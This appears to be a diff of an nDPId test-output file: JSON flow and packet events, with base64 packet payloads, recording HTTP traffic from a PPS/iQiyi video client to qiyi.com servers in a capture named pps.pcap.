-01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} +01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 